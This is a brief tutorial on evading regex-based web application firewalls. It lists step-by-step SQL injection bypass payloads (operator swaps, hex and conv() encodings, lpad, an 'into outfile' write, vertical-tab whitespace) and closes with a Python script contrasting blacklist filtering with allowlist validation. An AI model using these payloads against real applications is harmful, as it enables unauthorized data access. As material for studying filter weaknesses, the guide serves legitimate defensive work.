AwesomeWAF: A Guide to WAF Bypass Techniques

30 September 2019, 08:00:11


Regex bypass

Many WAFs rely on regular-expression matching.

Blacklist detection / bypass

Case: SQL injection

• Step 1:

Filtered keywords: and, or, union
Likely regex: preg_match('/(and|or|union)/i', $id)

  • Blocked statement: union select user, password from users
  • Bypass statement: 1 || (select user from users where user_id = 1) = 'admin'
• Step 2:

Filtered keywords: and, or, union, where

  • Blocked statement: 1 || (select user from users where user_id = 1) = 'admin'
  • Bypass statement: 1 || (select user from users limit 1) = 'admin'
• Step 3:

Filtered keywords: and, or, union, where, limit

  • Blocked statement: 1 || (select user from users limit 1) = 'admin'
  • Bypass statement: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
• Step 4:

Filtered keywords: and, or, union, where, limit, group by

  • Blocked statement: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  • Bypass statement: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
• Step 5:

Filtered keywords: and, or, union, where, limit, group by, select

  • Blocked statement: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
  • Bypass statement: 1 || 1 = 1 into outfile 'result.txt'
  • Bypass statement: 1 || substr(user,1,1) = 'a'
• Step 6:

Filtered keywords: and, or, union, where, limit, group by, select, ' (single quote)

  • Blocked statement: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
  • Bypass statement: 1 || user_id is not null
  • Bypass statement: 1 || substr(user,1,1) = 0x61
  • Bypass statement: 1 || substr(user,1,1) = unhex(61)
• Step 7:

Filtered keywords: and, or, union, where, limit, group by, select, ', hex

  • Blocked statement: 1 || substr(user,1,1) = unhex(61)
  • Bypass statement: 1 || substr(user,1,1) = lower(conv(11,10,36))
• Step 8:

Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr

  • Blocked statement: 1 || substr(user,1,1) = lower(conv(11,10,36))
  • Bypass statement: 1 || lpad(user,7,1)
• Step 9:

Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, white space

  • Blocked statement: 1 || lpad(user,7,1)
  • Bypass statement: 1%0b||%0blpad(user,7,1) (%0b is the URL-encoded vertical tab, which the space filter does not cover)
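As an added example (not part of the original page), this Python script applies the Step 1 regex blacklist to the page's own statements and contrasts it with positive validation of the id parameter: a blacklist only catches the keywords it lists, whereas checking that the value has the expected shape rejects every one of the page's payloads, whatever keyword, encoding or whitespace trick it uses. The sample inputs are constructed from the page's steps.

```python
import re

# The Step 1 keyword blacklist, as the page's preg_match would apply it.
STEP1_BLACKLIST = re.compile(r'(and|or|union)', re.IGNORECASE)

# Constructed inputs: the page's Step 1 blocked statement, three of its later
# bypass statements, and a benign id that a real application would expect.
SAMPLES = {
    "step1_blocked": "union select user, password from users",
    "step1_bypass": "1 || (select user from users where user_id = 1) = 'admin'",
    "step6_bypass": "1 || substr(user,1,1) = 0x61",
    "step9_bypass": "1\x0b||\x0blpad(user,7,1)",  # %0b decoded to a vertical tab
    "benign_id": "42",
}


def blacklist_blocks(value: str) -> bool:
    """Mirror the page's blacklist: reject only if a listed keyword appears."""
    return STEP1_BLACKLIST.search(value) is not None


def allowlist_accepts(value: str) -> bool:
    """Positive validation for an id parameter: only a short decimal integer.

    Anything outside the expected shape is rejected, so the check does not
    depend on enumerating keywords, encodings or whitespace variants.
    """
    return re.fullmatch(r'[0-9]{1,10}', value) is not None


def compare(samples: dict) -> dict:
    """Return {name: (blocked_by_blacklist, accepted_by_allowlist)} per sample."""
    return {name: (blacklist_blocks(v), allowlist_accepts(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, (blocked, accepted) in compare(SAMPLES).items():
        print(f"{name:14s} blacklist_blocks={blocked!s:5s} allowlist_accepts={accepted}")
```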
